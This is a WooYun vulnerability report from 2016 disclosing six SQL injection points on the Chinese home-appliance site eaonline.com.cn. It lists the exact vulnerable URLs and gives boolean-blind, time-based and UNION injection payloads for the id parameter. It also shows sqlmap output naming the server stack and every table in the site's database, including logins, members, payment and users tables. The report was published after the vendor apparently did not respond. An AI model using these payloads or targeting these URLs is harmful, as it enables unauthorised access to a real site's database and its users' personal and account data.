当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0196060

漏洞标题:中国家电在线6处sql注入打包

相关厂商:中国家电在线

漏洞作者: 路人甲

提交时间:2016-04-14 10:12

修复时间:2016-05-29 10:20

公开时间:2016-05-29 10:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://www.eaonline.com.cn/chargezone/chargeContent.dll?id=1000
http://www.eaonline.com.cn/chargezone/chargeList.dll?kind=b
http://www.eaonline.com.cn/info/serviceContent.dll?id=82818
http://www.eaonline.com.cn/cpzs/cpzs.php?id=1369
http://www.eaonline.com.cn/info/infoContent.dll?id=123540
http://www.eaonline.com.cn/info/infoListnews.dll?id=10

漏洞证明:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1000 AND 4867=4867
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1000 AND (SELECT * FROM (SELECT(SLEEP(5)))romR)
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: id=-1160 UNION ALL SELECT NULL,NULL,CONCAT(0x71716a6271,0x4b635659414c526f736e535754657368654552735451486e776a444c64596d5045756b566f585854,0x717a766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[12:13:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12


Database: cheaa                                                            
[74 tables]
+---------------------------------------+
| b_logins |
| b_members |
| b_products |
| bbs |
| bginfo |
| bid |
| cheaa_bbsrt |
| cheaa_bginfo |
| cheaa_cpzs |
| cheaa_cpzstj |
| cheaa_jdrw |
| cheaa_zdyzt |
| cheaamembers |
| cheaaplbak |
| city |
| column_name |
| commonproperty |
| content |
| customization |
| customize |
| eadgtj |
| ealmtt |
| enterprise |
| enterpriseinfo |
| enterpriseinfo_0813 |
| enterpriseinfo_0815 |
| flux |
| info |
| jituan |
| loginlevel |
| logins |
| logins_0815 |
| m_info |
| members |
| members_0813 |
| members_0815 |
| operators |
| orders |
| payment |
| penster |
| permissions |
| personalinfo |
| piccp |
| picly |
| picnews |
| price |
| privateproperty |
| productchildtype |
| producttype |
| propertyname |
| province |
| publish |
| publishbak3 |
| rdpl |
| re_bid |
| relations |
| source |
| survey |
| text |
| titles |
| tongxunlu |
| toutiao |
| txl |
| users |
| vote |
| voteip |
| wsdclilin |
| xi_pic |
| xiaolei |
| yewu |
| yxz |
| zdyzt |
| zhuanti |
| ztlilin |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+

修复方案:

还会继续的

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评价